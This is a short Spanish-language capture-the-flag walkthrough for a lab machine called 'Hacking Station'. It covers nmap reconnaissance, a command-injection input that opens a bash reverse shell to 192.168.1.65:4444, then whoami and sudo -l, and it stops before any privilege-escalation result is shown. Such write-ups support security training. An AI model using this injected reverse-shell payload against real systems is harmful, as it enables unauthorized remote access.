Hacking Station
🔍 Dificultad: Muy Fácil
🔍 RECONOCIMIENTO
En primer lugar, tras conectarnos a la máquina, utilizamos el comando:
ping -c 1 192.168.1.56
para verificar la conectividad de red.

A continuación, se realiza el comando:
nmap -p- --open 192.168.1.56 --min-rate 5000 -n
para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo el puerto 80 perteneciente al servicio HTTP está abierto, por lo que a continuación se indagará más.
🔎 EXPLORACIÓN
Se utiliza el comando:
sudo nmap -sCV -p80 -v 192.168.1.56
para obtener más información sobre ese puerto específicamente.

Revisamos puerto 80.

🚀 EXPLOTACIÓN
Consiste en un Command Injection por lo que nos mandaremos una Reverse Shell.
hola;bash -c 'bash -i >& /dev/tcp/192.168.1.65/4444 0>&1'
Nos ponemos en escucha.

Hacemos el tratamiento de la TTY para trabajar más cómodos.
🔐 PRIVILEGIOS
Al estar dentro y ejecutar:
whoami
aún no somos root, por lo que hacemos:
sudo -l
para ver si hay algo para explotar.


Last updated
Was this helpful?